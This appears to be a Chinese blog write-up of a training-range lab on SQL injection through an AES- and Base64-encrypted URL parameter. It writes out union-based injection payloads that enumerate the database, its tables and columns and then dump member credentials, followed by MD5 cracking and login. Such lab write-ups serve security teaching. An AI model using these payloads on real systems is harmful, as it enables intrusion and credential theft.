墨者靶场-SQL注入-参数加密

mikuku9个月前叽里咕噜小代码379

image.png

访问当前地址

叽里咕噜可以发现有一个可以看到的参数

image.png

在URL中可以看到有一个加密的数据

而对加密数据我们肯定首先要判断他是什么加密,所以我们直接看能不能找到他的源码,使用御剑进行扫描

image.png

可以发现一个目录,我们访问他

image.png

可以看到靶场贴心的为我们准备好了源码,我们下载查看

image.png

可以看到他的加密方式是AES-128j加密的

然后key和偏移量也写在下面了,然后这个还套了一层Base64加密,所以我们先试用base64解密出另一个密文再用AES解密即可得出明文

image.png

image.png

可以看到这明文了

所以我们现在可以尝试构造攻击语句看是否能查看到数据库信息从而得到账户登录到后台

首先我们查看一下数据库名

-1 union select 1,database(),user(),4_mozhe

加密一下

然后输出

image.png

查看到了数据库名继续下一步

1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.TABLES where TABLE_SCHEMA='mozhe_Discuz_StormGroup' limit 0,1_mozhe

image.png找到表名我们就可以尝试查看一下表里的字段

-1 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name='StormGroup_member' _mozhe

image.png

可以看到有user和password字段,我们再来查看一下

-1 union select 1,name,password,4 from StormGroup_member limit 1,1_mozhe

image.png

可以得到账户和密码,我们再对密码进行解密,看着很像MD5,我们用MD5解密

image.png

可以看到密码力,现在我们尝试登录

image.png

image.png

这样就得出key力,完美~~~~

相关文章

安全开发-web应用-JS-打包器&第三方库

安全开发-web应用-JS-打包器&第三方库

上期我们学习了关于nodejs的框架开发,也知道了他有什么漏洞,现在我们继续来扩展关于js的一些相关安全芝士,这期差不多就是一个扩展,简单的提一下首先我们就来看看这个webpack到底有啥用将项目中各...

安全开发-web应用-PHP-框架开发

安全开发-web应用-PHP-框架开发

一开始我们学习信息打点的时候我们介绍过了框架这个东西,框架就是第三方开发的一个源码,里面核心内容也就是网站的各个功能都是开发好的,只需要把相应的配置配好,就可以直接开始使用了,对于简单的网站搭建还是很...

WEB攻防-XSS跨站注入(一)

WEB攻防-XSS跨站注入(一)

XSS跨站漏洞,这个漏洞的原理就是通过可控制的某些函数,植入payload然后用户通过访问到这个被攻击的地方触发了漏洞,然后就执行了一次攻击,听起来好像就没啥,这个漏洞确实也没啥,因为他大部分都是在前...

安全开发-web应用-PHP-留言板与登录防护

安全开发-web应用-PHP-留言板与登录防护

当你获得了目标的源码,这时候代码审计看不懂了怎么办,这时候就要学习到奇妙的web开发了,然后学会之后就可以转行去做开发了,当什么网安工程师(狗头)对于我们而言,我们要学习的语言就是通常web开发中经常...

WEB攻防-XSS跨站注入(二)

WEB攻防-XSS跨站注入(二)

上期说到普通的XSS注入,这次来说点新的,(谁懂写一半让我重新登录然后笔记全没的救赎感)...

安全开发-web应用-JS-Nodejs

安全开发-web应用-JS-Nodejs

上期我们学习了关于原生开发的DOM树和学习了断点调试,又知道了关于dom-xss的漏洞捏,简单的利用了js调试来尝试加密数据包,好用捏今天我们来看看关于第三方库的使用什么事nodejs呢,他是运行在服...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。